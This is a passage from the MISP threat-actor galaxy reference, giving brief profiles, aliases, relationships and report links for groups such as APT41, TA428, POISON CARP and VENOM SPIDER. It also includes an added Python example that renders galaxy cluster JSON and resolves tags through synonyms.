https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/

https://www.intezer.com/blog-technical-analysis-cryptocurrency-mining-war-on-the-cloud/

https://unit42.paloaltonetworks.com/atoms/agedlibra/

[Vault 7/8]

An unnamed source leaked almost 10,000 documents describing a large number of 0-day vulnerabilities, methodologies and tools that had been collected by the CIA. This leaking was done through WikiLeaks, starting in March 2017. In weekly publications, the dumps were said to come from Vault 7 and later Vault 8, until the source's arrest in 2018. Most of the published vulnerabilities have since been fixed by the respective vendors, but many have been used by other threat actors. This actor turned out to be a former CIA software engineer. (WikiLeaks) Today, Tuesday 7 March 2017, WikiLeaks begins its new series of leaks on the U.S. Central Intelligence Agency. Code-named "Vault 7" by WikiLeaks, it is the largest ever publication of confidential documents on the agency. The first full part of the series, "Year Zero", comprises 8,761 documents and files from an isolated, high-security network situated inside the CIA’s Center for Cyber Intelligence in Langley, Virginia. It follows an introductory disclosure last month of CIA targeting French political parties and candidates in the lead up to the 2012 presidential election. Recently, the CIA lost control of the majority of its hacking arsenal including malware, viruses, trojans, weaponized "zero day" exploits, malware remote control systems and associated documentation. This extraordinary collection, which amounts to more than several hundred million lines of code, gives its possessor the entire hacking capacity of the CIA. The archive appears to have been circulated among former U.S. government hackers and contractors in an unauthorized manner, one of whom has provided WikiLeaks with portions of the archive. "Year Zero" introduces the scope and direction of the CIA’s global covert hacking program, its malware arsenal and dozens of "zero day" weaponized exploits against a wide range of U.S. and European company products, including Apple’s iPhone, Google’s Android and Microsoft’s Windows and even Samsung TVs, which are turned into covert microphones.

The tag is: misp-galaxy:threat-actor="[Vault 7/8]"

Table 12007. Table References

Links

https://wikileaks.org/ciav7p1/

https://www.justice.gov/opa/pr/joshua-adam-schulte-charged-unauthorized-disclosure-classified-information-and-other-offenses

ZOMBIE SPIDER

On April 7, 2017, Pyotr Levashov — who predominantly used the alias Severa or Peter Severa and whom Falcon Intelligence tracks as ZOMBIE SPIDER — was arrested in an international law enforcement operation led by the FBI. ZOMBIE SPIDER’s specialty was large-scale spam distribution, a fundamental component of cybercrime operations. Levashov was the primary threat actor behind a botnet known as Kelihos and its predecessors, Waledac and Storm. In addition to Levashov’s arrest, there was a technical operation conducted by Falcon Intelligence to seize control of the Kelihos botnet.

The tag is: misp-galaxy:threat-actor="ZOMBIE SPIDER"

Table 12008. Table References

Links

https://www.crowdstrike.com/blog/farewell-to-kelihos-and-zombie-spider/

https://www.crowdstrike.com/blog/inside-the-takedown-of-zombie-spider-and-the-kelihos-botnet/

https://www.justice.gov/opa/pr/justice-department-announces-actions-dismantle-kelihos-botnet-0

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2018GlobalThreatReport.pdf

ViceLeaker

In May 2018, we discovered a campaign targeting dozens of mobile Android devices belonging to Israeli citizens. Kaspersky spyware sensors caught the signal of an attack from the device of one of the victims, and a hash of the APK (Android application) involved was tagged in our sample feed for inspection. Once we looked into the file, we quickly found out that the inner workings of the APK included a malicious payload, embedded in the original code of the application. This was an original spyware program, designed to exfiltrate almost all accessible information. During the course of our research, we noticed that we were not the only ones to have found the operation. Researchers from Bitdefender also released an analysis of one of the samples in a blog post. Although something had already been published, we decided to do something different with the data we acquired. The following month, we released a private report on our Threat Intelligence Portal to alert our clients about this newly discovered operation and began writing YARA rules in order to catch more samples. We decided to call the operation “ViceLeaker” because of strings and variables in its code.

The tag is: misp-galaxy:threat-actor="ViceLeaker"

Table 12009. Table References

Links

https://securelist.com/fanning-the-flames-viceleaker-operation/90877/

SWEED

Cisco Talos recently identified a large number of ongoing malware distribution campaigns linked to a threat actor we’re calling "SWEED," including such notable malware as Formbook, Lokibot and Agent Tesla. Based on our research, SWEED — which has been operating since at least 2017 — primarily targets their victims with stealers and remote access trojans. SWEED remains consistent across most of their campaigns in their use of spear-phishing emails with malicious attachments. While these campaigns have featured a myriad of different types of malicious documents, the actor primarily tries to infect its victims with a packed version of Agent Tesla — an information stealer that’s been around since at least 2014. The version of Agent Tesla that SWEED is using differs slightly from what we’ve seen in the past in the way that it is packed, as well as how it infects the system. In this post, we’ll run down each campaign we’re able to connect to SWEED, and talk about some of the actor’s tactics, techniques and procedures (TTPs).

The tag is: misp-galaxy:threat-actor="SWEED"

Table 12010. Table References

Links

https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html

TA428

Proofpoint researchers have identified a targeted APT campaign that utilized malicious RTF documents to deliver custom malware to unsuspecting victims. We dubbed this campaign “Operation LagTime IT” based on entities that were targeted and the distinctive domains registered to C&C IP infrastructure. Beginning in early 2019, these threat actors targeted a number of government agencies in East Asia overseeing government information technology, domestic affairs, foreign affairs, economic development, and political processes. We determined that the infection vector observed in this campaign was spear phishing, with emails originating from both free email accounts and compromised user accounts. Attackers relied on Microsoft Equation Editor exploit CVE-2018-0798 to deliver a custom malware that Proofpoint researchers have dubbed Cotx RAT. Additionally, this APT group utilizes Poison Ivy payloads that share overlapping command and control (C&C) infrastructure with the newly identified Cotx campaigns. Based on infrastructure overlaps, post-exploitation techniques, and historic TTPs utilized in this operation, Proofpoint analysts attribute this activity to the Chinese APT group tracked internally as TA428. Researchers believe that this activity has an operational and tactical resemblance to the Maudi Surveillance Operation which was previously reported in 2013.

The tag is: misp-galaxy:threat-actor="TA428"

TA428 is also known as:

  • Colourful Panda

  • BRONZE DUDLEY

Table 12011. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology

https://www.recordedfuture.com/china-linked-ta428-threat-group

https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia

https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop

https://blog.group-ib.com/task

https://www.sentinelone.com/labs/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op

https://www.youtube.com/watch?v=1WfPlgtfWnQ

https://vb2020.vblocalhost.com/uploads/VB2020-20.pdf

https://vb2020.vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf

https://st.drweb.com/static/new-www/news/2021/april/drweb_research_attacks_on_russian_research_institutes_en.pdf

LYCEUM

Lyceum is an Iranian APT group that has been active since at least 2014. It primarily targets Middle Eastern governments and organizations in the energy and telecommunications sectors. Lyceum conducts cyber espionage and has been linked to other Iranian threat groups such as APT34. It has developed and deployed malware families such as Shark and Milan, and has been observed using DNS tunneling and HTTP for command and control communication.

The tag is: misp-galaxy:threat-actor="LYCEUM"

LYCEUM is also known as:

  • COBALT LYCEUM

  • HEXANE

  • UNC1530

  • Spirlin

  • MYSTICDOME

  • siamesekitten

  • Chrono Kitten

  • Storm-0133

Table 12012. Table References

Links

https://www.secureworks.com/blog/lyceum-takes-center-stage-in-middle-east-campaign

https://www.secureworks.com/research/threat-profiles/cobalt-lyceum

https://www.prevailion.com/latest-targets-of-cyber-group-lyceum/

https://www.clearskysec.com/siamesekitten/

https://vblocalhost.com/uploads/VB2021-Kayal-etal.pdf

https://services.google.com/fh/files/misc/tool-of-first-resort-israel-hamas-war-cyber.pdf

APT41

APT41 is a prolific cyber threat group that carries out Chinese state-sponsored espionage activity in addition to financially motivated activity potentially outside of state control.

The tag is: misp-galaxy:threat-actor="APT41"

APT41 is also known as:

  • G0096

  • TA415

  • Blackfly

  • Grayfly

  • LEAD

  • BARIUM

  • WICKED SPIDER

  • WICKED PANDA

  • BRONZE ATLAS

  • BRONZE EXPORT

  • Red Kelpie

  • G0044

  • Earth Baku

  • Amoeba

  • HOODOO

  • Brass Typhoon

APT41 has relationships with:

  • uses: misp-galaxy:backdoor="Speculoos" with estimative-language:likelihood-probability="very-likely"

  • similar: misp-galaxy:threat-actor="APT17" with estimative-language:likelihood-probability="very-likely"

  • similar: misp-galaxy:mitre-intrusion-set="Winnti Group - G0044" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="BARIUM" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="LEAD" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Brass Typhoon" with estimative-language:likelihood-probability="likely"

Table 12013. Table References

Links

https://securelist.com/winnti-faq-more-than-just-a-game/57585/

https://securelist.com/winnti-more-than-just-a-game/37029/

http://williamshowalter.com/a-universal-windows-bootkit/

https://www.microsoft.com/security/blog/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp/

https://securelist.com/games-are-over/70991/

https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a

https://www.dw.com/en/thyssenkrupp-victim-of-cyber-attack/a-36695341

https://www.bleepingcomputer.com/news/security/teamviewer-confirms-undisclosed-breach-from-2016/

https://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/

https://www.dw.com/en/bayer-points-finger-at-wicked-panda-in-cyberattack/a-48196004

https://www.welivesecurity.com/2019/03/11/gaming-industry-scope-attackers-asia/

https://401trg.com/burning-umbrella/

https://attack.mitre.org/groups/G0044/

https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-july-wicked-spider/

https://www.secureworks.com/research/threat-profiles/bronze-atlas

https://www.secureworks.com/research/threat-profiles/bronze-export

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer

https://assets.documentcloud.org/documents/7210602/FLASH-AC-000133-TT-Published.pdf

https://www.cfr.org/cyber-operations/winnti-umbrella

https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html

https://unit42.paloaltonetworks.com/apt41-using-new-speculoos-backdoor-to-target-organizations-globally/

https://www.mandiant.com/resources/report-apt41-double-dragon-a-dual-espionage-and-cyber-crime-operation

https://www.cfr.org/cyber-operations/apt-41

https://attack.mitre.org/groups/G0096

https://www.uscc.gov/sites/default/files/2022-02/Adam_Kozy_Testimony.pdf

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/

https://services.google.com/fh/files/blogs/gcat_threathorizons_full_apr2023.pdf
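Every entry on this page (the "The tag is" line, the "is also known as" list, the "has relationships with" list with its estimative-language qualifier, and the reference links) is generated from the galaxy's machine-readable cluster JSON. The following script is an added example, not MISP project code, showing how that JSON maps onto the layout seen in the APT41 entry above and how a tag such as `misp-galaxy:threat-actor="TWISTED SPIDER"` can be resolved back to a cluster through its synonyms. The cluster file embedded in it is constructed and abbreviated, with placeholder UUIDs; it assumes the misp-galaxy cluster layout as the author of this example understands it (a `values` list whose items carry `meta.synonyms`, `meta.refs` and `related` entries with `dest-uuid`, `type` and `tags`).

```python
"""Added example: render a MISP galaxy cluster in this page's layout and
resolve tags (including synonyms) back to clusters. The sample cluster
below is constructed for illustration; the UUIDs are placeholders."""
import json
import re
from typing import Dict, List, Optional

SAMPLE_GALAXY = json.dumps({
    "name": "Threat Actor",
    "type": "threat-actor",
    "values": [
        {
            "uuid": "00000000-0000-4000-8000-000000000001",
            "value": "Example Group",
            "description": "Constructed entry for illustration only.",
            "meta": {
                "synonyms": ["EXAMPLE SPIDER", "Example Typhoon"],
                "refs": ["https://example.invalid/report"],
            },
            "related": [{
                "dest-uuid": "00000000-0000-4000-8000-000000000002",
                "type": "similar",
                "tags": ['estimative-language:likelihood-probability="likely"'],
            }, {
                # Points into another galaxy file that is not loaded here.
                "dest-uuid": "00000000-0000-4000-8000-0000000000ff",
                "type": "uses",
                "tags": ['estimative-language:likelihood-probability="very-likely"'],
            }],
        },
        {
            "uuid": "00000000-0000-4000-8000-000000000002",
            "value": "Other Group",
            "description": "Constructed entry for illustration only.",
            "meta": {"synonyms": []},
        },
    ],
})

# misp-galaxy:<galaxy type>="<cluster value>"
TAG_RE = re.compile(r'^misp-galaxy:(?P<type>[^=]+)="(?P<value>.+)"$')


def tag_for(galaxy_type: str, value: str) -> str:
    """Build the tag string MISP attaches to an event for this cluster."""
    return f'misp-galaxy:{galaxy_type}="{value}"'


def load_galaxy(text: str) -> dict:
    """Parse a cluster file and index clusters by UUID and by name/synonym."""
    galaxy = json.loads(text)
    galaxy["_by_uuid"] = {c["uuid"]: c for c in galaxy["values"]}
    by_name: Dict[str, dict] = {}
    for cluster in galaxy["values"]:
        # Canonical names win over synonyms; matching is case-insensitive so
        # that "TWISTED SPIDER" and "Twisted Spider" resolve to the same entry.
        by_name[cluster["value"].lower()] = cluster
        for synonym in cluster.get("meta", {}).get("synonyms", []):
            by_name.setdefault(synonym.lower(), cluster)
    galaxy["_by_name"] = by_name
    return galaxy


def resolve_tag(galaxy: dict, tag: str) -> Optional[dict]:
    """Return the cluster a tag refers to, accepting synonyms; None if unknown."""
    match = TAG_RE.match(tag)
    if not match or match.group("type") != galaxy["type"]:
        return None
    return galaxy["_by_name"].get(match.group("value").lower())


def render_entry(galaxy: dict, cluster: dict) -> List[str]:
    """Produce the lines of one entry in the layout used on this page."""
    name = cluster["value"]
    meta = cluster.get("meta", {})
    lines = [name, "", cluster.get("description", ""), "",
             f"The tag is: {tag_for(galaxy['type'], name)}", ""]
    if meta.get("synonyms"):
        lines.append(f"{name} is also known as:")
        lines.extend(f"  • {s}" for s in meta["synonyms"])
        lines.append("")
    if cluster.get("related"):
        lines.append(f"{name} has relationships with:")
        for rel in cluster["related"]:
            target = galaxy["_by_uuid"].get(rel["dest-uuid"])
            target_text = (tag_for(galaxy["type"], target["value"]) if target
                           else f"unresolved uuid {rel['dest-uuid']}")
            qualifiers = f" with {', '.join(rel['tags'])}" if rel.get("tags") else ""
            lines.append(f"  • {rel['type']}: {target_text}{qualifiers}")
        lines.append("")
    if meta.get("refs"):
        lines.append("Links")
        lines.extend(meta["refs"])
    return lines


if __name__ == "__main__":
    g = load_galaxy(SAMPLE_GALAXY)
    hit = resolve_tag(g, 'misp-galaxy:threat-actor="example typhoon"')
    print("\n".join(render_entry(g, hit)))
```

Relationships in the real files frequently point into other galaxies (the APT41 entry references `mitre-intrusion-set` and `microsoft-activity-group` clusters), so a production script loads every cluster file before rendering; here an unresolved `dest-uuid` is printed as such rather than silently dropped.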

Tortoiseshell

A previously undocumented attack group is using both custom and off-the-shelf malware to target IT providers in Saudi Arabia in what appear to be supply chain attacks with the end goal of compromising the IT providers’ customers. The group, which we are calling Tortoiseshell, has been active since at least July 2018. Symantec has identified a total of 11 organizations hit by the group, the majority of which are based in Saudi Arabia. In at least two organizations, evidence suggests that the attackers gained domain admin-level access.

The tag is: misp-galaxy:threat-actor="Tortoiseshell"

Tortoiseshell is also known as:

  • IMPERIAL KITTEN

  • Yellow Liderc

  • Imperial Kitten

  • TA456

  • DUSTYCAVE

  • Crimson Sandstorm

Table 12014. Table References

Links

https://www.symantec.com/blogs/threat-intelligence/tortoiseshell-apt-supply-chain

https://www.darkreading.com/threat-intelligence/iranian-government-hackers-target-us-veterans/d/d-id/1335897

https://ctoatncsc.substack.com/p/cto-at-ncsc-summary-week-ending-october

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/yellow-liderc-ships-its-scripts-delivers-imaploader-malware.html

https://ics-cert.kaspersky.com/publications/reports/2023/09/25/apt-and-financial-attacks-on-industrial-organizations-in-h1-2023/

https://services.google.com/fh/files/misc/tool-of-first-resort-israel-hamas-war-cyber.pdf

POISON CARP

Between November 2018 and May 2019, senior members of Tibetan groups received malicious links in individually tailored WhatsApp text exchanges with operators posing as NGO workers, journalists, and other fake personas. The links led to code designed to exploit web browser vulnerabilities to install spyware on iOS and Android devices, and in some cases to OAuth phishing pages. This campaign was carried out by what appears to be a single operator that we call POISON CARP.

The tag is: misp-galaxy:threat-actor="POISON CARP"

POISON CARP is also known as:

  • Evil Eye

  • Red Dev 16

  • Earth Empusa

Table 12015. Table References

Links

https://citizenlab.ca/2019/09/poison-carp-tibetan-groups-targeted-with-1-click-mobile-exploits/

https://www.volexity.com/blog/2019/09/02/digital-crackdown-large-scale-surveillance-and-exploitation-of-uyghurs/

https://www.trendmicro.com/en_us/research/20/f/new-android-spyware-actionspy-revealed-via-phishing-attacks-from-earth-empusa.html

TA410

Early in August 2019, Proofpoint described what appeared to be state-sponsored activity targeting the US utilities sector with malware that we dubbed “LookBack”. Between August 21 and August 29, 2019, several spear phishing emails were identified targeting additional US companies in the utilities sector. The phishing emails originated from what appears to be an actor-controlled domain: globalenergycertification[.]net. This domain, like those used in previous campaigns, impersonated a licensing body related to the utilities sector. In this case, it masqueraded as the legitimate domain for Global Energy Certification (“GEC”). The emails include a GEC examination-themed body and a malicious Microsoft Word attachment that uses macros to install and run LookBack. (Note: the malware, the campaign and the threat actor are conflated under this name.)

The tag is: misp-galaxy:threat-actor="TA410"

Table 12016. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/lookback-forges-ahead-continued-targeting-united-states-utilities-sector-reveals

https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks

https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new

Operation Soft Cell

In 2018, the Cybereason Nocturnus team identified an advanced, persistent attack targeting global telecommunications providers, carried out by a threat actor using tools and techniques commonly associated with Chinese-affiliated threat actors such as APT10. This multi-wave attack focused on obtaining data on specific, high-value targets and resulted in a complete takeover of the network.

The tag is: misp-galaxy:threat-actor="Operation Soft Cell"

Operation Soft Cell has relationships with:

  • similar: misp-galaxy:threat-actor="GALLIUM" with estimative-language:likelihood-probability="almost-certain"

  • similar: misp-galaxy:microsoft-activity-group="GALLIUM" with estimative-language:likelihood-probability="likely"

Table 12017. Table References

Links

https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers

Operation WizardOpium

We are calling these attacks Operation WizardOpium. So far, we have been unable to establish a definitive link with any known threat actors. There are certain very weak code similarities with Lazarus attacks, although these could very well be a false flag. The profile of the targeted website is more in line with earlier DarkHotel attacks that have recently deployed similar false flag attacks.

The tag is: misp-galaxy:threat-actor="Operation WizardOpium"

Table 12018. Table References

Links

https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/

Calypso

PT Expert Security Center specialists first detected the activity of the Calypso group in March 2019, during threat-detection work. As a result, many of the group's malware samples were obtained, and the affected organizations and the attackers' command-and-control servers were identified. According to our data, the group has been active since at least September 2016. The group's main goal is to steal confidential data; its main victims are government agencies in Brazil, India, Kazakhstan, Russia, Thailand and Turkey. Our data suggest that the group has Asian roots. Description translated from Russian.

The tag is: misp-galaxy:threat-actor="Calypso"

Calypso is also known as:

  • BRONZE MEDLEY

Table 12019. Table References

Links

https://www.ptsecurity.com/upload/corporate/ru-ru/analytics/calypso-apt-2019-rus.pdf

https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/

TA2101

Proofpoint researchers detected campaigns from a relatively new actor, tracked internally as TA2101, targeting German companies and organizations to deliver and install backdoor malware. The actor initiated their campaigns impersonating the Bundeszentralamt für Steuern, Germany's Federal Central Tax Office, with lookalike domains, verbiage, and stolen branding in the emails. For their campaigns in Germany, the actor chose Cobalt Strike, a commercially licensed software tool that is generally used for penetration testing and emulates the type of backdoor framework used by Metasploit, a similar penetration testing tool. Proofpoint researchers have also observed this actor distributing Maze ransomware, employing similar social engineering techniques to those it uses for Cobalt Strike, while also targeting organizations in Italy and impersonating the Agenzia delle Entrate, the Italian Revenue Agency. We have also recently observed the actor targeting organizations in the United States using the IcedID banking Trojan while impersonating the United States Postal Service (USPS).

The tag is: misp-galaxy:threat-actor="TA2101"

TA2101 is also known as:

  • Maze Team

  • TWISTED SPIDER

  • GOLD VILLAGE

  • Storm-0216

  • DEV-0216

  • Twisted Spider

Table 12020. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/ta2101-plays-government-imposter-distribute-malware-german-italian-and-us

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/

https://adversary.crowdstrike.com/adversary/twisted-spider/

https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf

https://www.secureworks.com/blog/how-cyber-adversaries-are-adapting-to-exploit-the-global-pandemic

http://www.secureworks.com/research/threat-profiles/gold-village

https://www.cysecurity.news/2023/12/twisted-spiders-dangerous-cactus.html

APT-C-34

As reported by ZDNet, the Chinese cyber-security vendor Qihoo 360 published a report on 2019-11-29 exposing an extensive hacking operation targeting Kazakhstan. Targets included individuals and organizations from all walks of life: government agencies, military personnel, foreign diplomats, researchers, journalists, private companies, the educational sector, religious figures and government dissidents. The campaign, Qihoo 360 said, was broad and appears to have been carried out by a threat actor with considerable resources, one able to develop its own private hacking tools, buy expensive spyware on the surveillance market, and even invest in radio communications interception hardware.

The tag is: misp-galaxy:threat-actor="APT-C-34"

APT-C-34 is also known as:

  • Golden Falcon

Table 12021. Table References

Links

http://blogs.360.cn/post/APT-C-34_Golden_Falcon.html

https://www.zdnet.com/article/extensive-hacking-operation-discovered-in-kazakhstan/

luoxk

Luoxk is a malware campaign targeting web servers throughout Asia, Europe and North America.

The tag is: misp-galaxy:threat-actor="luoxk"

Table 12022. Table References

Links

https://www.systemtek.co.uk/2018/07/luoxk-malware-exploiting-cve-2018-2893/

RAZOR TIGER

An actor mainly targeting Pakistani military targets, active since at least 2012. We have low confidence that this malware might be authored by an Indian company. To spread the malware, they use unique implementations to leverage exploits for known vulnerabilities (such as CVE-2017-11882) and later deploy a PowerShell payload in the final stages.

The tag is: misp-galaxy:threat-actor="RAZOR TIGER"

RAZOR TIGER is also known as:

  • SideWinder

  • Rattlesnake

  • APT-C-17

  • T-APT-04

RAZOR TIGER has relationships with:

  • similar: misp-galaxy:malpedia="SideWinder (Windows)" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:360net-threat-actor="响尾蛇 - APT-C-24" with estimative-language:likelihood-probability="likely"

Table 12023. Table References

Links

https://securelist.com/apt-trends-report-q1-2018/85280/

https://blog.trendmicro.com/trendlabs-security-intelligence/first-active-attack-exploiting-cve-2019-2215-found-on-google-play-linked-to-sidewinder-apt-group/

https://otx.alienvault.com/pulse/5fd10760f9afb730d37c4742/

https://www.trendmicro.com/en_us/research/20/l/sidewinder-leverages-south-asian-territorial-issues-for-spear-ph.html

https://s.tencent.com/research/report/659.html

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/fireeye-sidewinder-targeted-attack.pdf

https://s.tencent.com/research/report/479.html

https://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c

https://mp.weixin.qq.com/s/8j_rHA7gdMxY1_X8alj8Zg

Operation Wocao

Operation Wocao (我操, “Wǒ cāo”, used as “shit” or “damn”) is the name that Fox-IT uses to describe the hacking activities of a China-based hacking group. This report details the profile of a publicly underreported threat actor that Fox-IT has dealt with over the past two years. Fox-IT assesses with high confidence that the actor is a Chinese group and that they are likely working to support the interests of the Chinese government and are tasked with obtaining information for espionage purposes. With medium confidence, Fox-IT assesses that the tools, techniques and procedures are those of the actor referred to as APT20 by industry partners. We have identified victims of this actor in more than 10 countries, in government entities, managed service providers and across a wide variety of industries, including Energy, Health Care and High-Tech.

The tag is: misp-galaxy:threat-actor="Operation Wocao"

Table 12024. Table References

Links

https://www.fox-it.com/nl/actueel/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/

Budminer

Based on the evidence we have presented, Symantec attributed the activity involving the Dripion malware to the Budminer advanced threat group. While we have not seen new campaigns using Taidoor malware since 2014, we believe the Budminer group has changed tactics to avoid detection after being outed publicly in security white papers and blogs over the past few years.

The tag is: misp-galaxy:threat-actor="Budminer"

Budminer is also known as:

  • Budminer cyberespionage group

Table 12025. Table References

Links

https://www.symantec.com/connect/blogs/taiwan-targeted-new-cyberespionage-back-door-trojan

https://app.box.com/s/xqh458fe1url7mgl072hhd0yxqw3x0jm

https://www.research-collection.ethz.ch/bitstream/handle/20.500.11850/389371/1/Cyber-Reports-2020-01-A-one-sided-Affair.pdf

Attor

Adversary group targeting diplomatic missions and governmental organisations.

The tag is: misp-galaxy:threat-actor="Attor"

Table 12026. Table References

Links

https://www.welivesecurity.com/2019/10/10/eset-discovers-attor-spy-platform

APT-C-12

According to 360 TIC the actor has carried out continuous cyber espionage activities since 2011 on key units and departments of the Chinese government, military industry, scientific research, and finance. The organization focuses on information related to the nuclear industry and scientific research. The targets were mainly concentrated in mainland China… [M]ore than 670 malware samples have been collected from the group, including more than 60 malicious plugins specifically for lateral movement; more than 40 C2 domain names and IPs related to the organization have also been discovered.

The tag is: misp-galaxy:threat-actor="APT-C-12"

APT-C-12 is also known as:

  • Sapphire Mushroom

  • Blue Mushroom

  • NuclearCrisis

Table 12027. Table References

Links

https://mp.weixin.qq.com/s/S-hiGFNC6WXGrkjytAVbpA

https://bitofhex.com/2020/02/10/sapphire-mushroom-lnk-files/

InvisiMole

Adversary group targeting diplomatic missions, governmental and military organisations, mainly in Ukraine.

The tag is: misp-galaxy:threat-actor="InvisiMole"

Table 12028. Table References

Links

https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/

https://www.welivesecurity.com/2020/06/18/digging-up-invisimole-hidden-arsenal/

ANTHROPOID SPIDER

Publicly known as 'EmpireMonkey', ANTHROPOID SPIDER conducted phishing campaigns in February and March 2019, spoofing French, Norwegian and Belizean financial regulators and institutions. These campaigns used macro-enabled Microsoft documents to deliver the PowerShell Empire post-exploitation framework. ANTHROPOID SPIDER likely enabled a breach that allegedly involved fraudulent transfers over the SWIFT network.

The tag is: misp-galaxy:threat-actor="ANTHROPOID SPIDER"

ANTHROPOID SPIDER is also known as:

  • Empire Monkey

  • CobaltGoblin

Table 12029. Table References

Links

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.kaspersky.com/about/press-releases/2019_fin7-hacking-group-targets-more-than-130-companies-after-leaders-arrest

https://fortiguard.com/encyclopedia/botnet/7630456

CLOCKWORK SPIDER

Opportunistic actor that installs a custom root certificate on victim machines to support man-in-the-middle network monitoring.

The tag is: misp-galaxy:threat-actor="CLOCKWORK SPIDER"

Table 12030. Table References

Links

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://na.eventscloud.com/file_uploads/6568237bca6dc156e5c5557c5989e97c_CrowdStrikeFal.Con2019_ThroughEyesOfAdversary_J.Ayers.pdf

DOPPEL SPIDER

In June 2019, CrowdStrike Intelligence observed a source code fork of BitPaymer and began tracking the new ransomware strain as DoppelPaymer. Further technical analysis revealed an increasing divergence between two versions of Dridex, with the new version dubbed DoppelDridex. Based on this evidence, CrowdStrike Intelligence assessed with high confidence that a new group split off from INDRIK SPIDER to form the adversary DOPPEL SPIDER. Following DOPPEL SPIDER’s inception, CrowdStrike Intelligence observed multiple BGH (big game hunting) incidents attributed to the group, with the largest known ransomware demand being 250 BTC. Other demands were not nearly as high, suggesting that the group conducts network reconnaissance to determine the value of the victim organization.

The tag is: misp-galaxy:threat-actor="DOPPEL SPIDER"

DOPPEL SPIDER is also known as:

  • GOLD HERON

Table 12031. Table References

Links

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

http://www.secureworks.com/research/threat-profiles/gold-heron

MONTY SPIDER

Spambots continued to decline in 2019, with MONTY SPIDER’s CraP2P spambot falling silent in April.

The tag is: misp-galaxy:threat-actor="MONTY SPIDER"

Table 12032. Table References

Links

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

NOCTURNAL SPIDER

Mentioned as a malware-as-a-service (MaaS) operator in CrowdStrike’s 2020 Report.

The tag is: misp-galaxy:threat-actor="NOCTURNAL SPIDER"

Table 12034. Table References

Links

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

SCULLY SPIDER

Mentioned as operator of DanaBot in CrowdStrike’s 2020 Report.

The tag is: misp-galaxy:threat-actor="SCULLY SPIDER"

Table 12035. Table References

Links

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

SMOKY SPIDER

Mentioned as operator of SmokeLoader in CrowdStrike’s 2020 Report.

The tag is: misp-galaxy:threat-actor="SMOKY SPIDER"

Table 12036. Table References

Links

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

VENOM SPIDER

VENOM SPIDER is the developer of a large toolset that includes SKID, VenomKit and Taurus Loader. Under the moniker 'badbullzvenom', the adversary has been an active member of Russian underground forums since at least 2012, specializing in the identification of vulnerabilities and the subsequent development of tools for exploitation, as well as for gaining and maintaining access to victim machines and carding services. Recent advertisements for the malware indicate that VENOM SPIDER limits the sale and use of its tools, selling modules only to trusted affiliates. This preference can be seen in the fact that adversaries observed using the tools include the targeted criminal adversary COBALT SPIDER and BGH adversaries WIZARD SPIDER and PINCHY SPIDER.

The tag is: misp-galaxy:threat-actor="VENOM SPIDER"

VENOM SPIDER is also known as:

  • badbullzvenom

  • badbullz

Table 12037. Table References

Links

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.esentire.com/web-native-pages/the-hunt-for-venom-spider-part-2

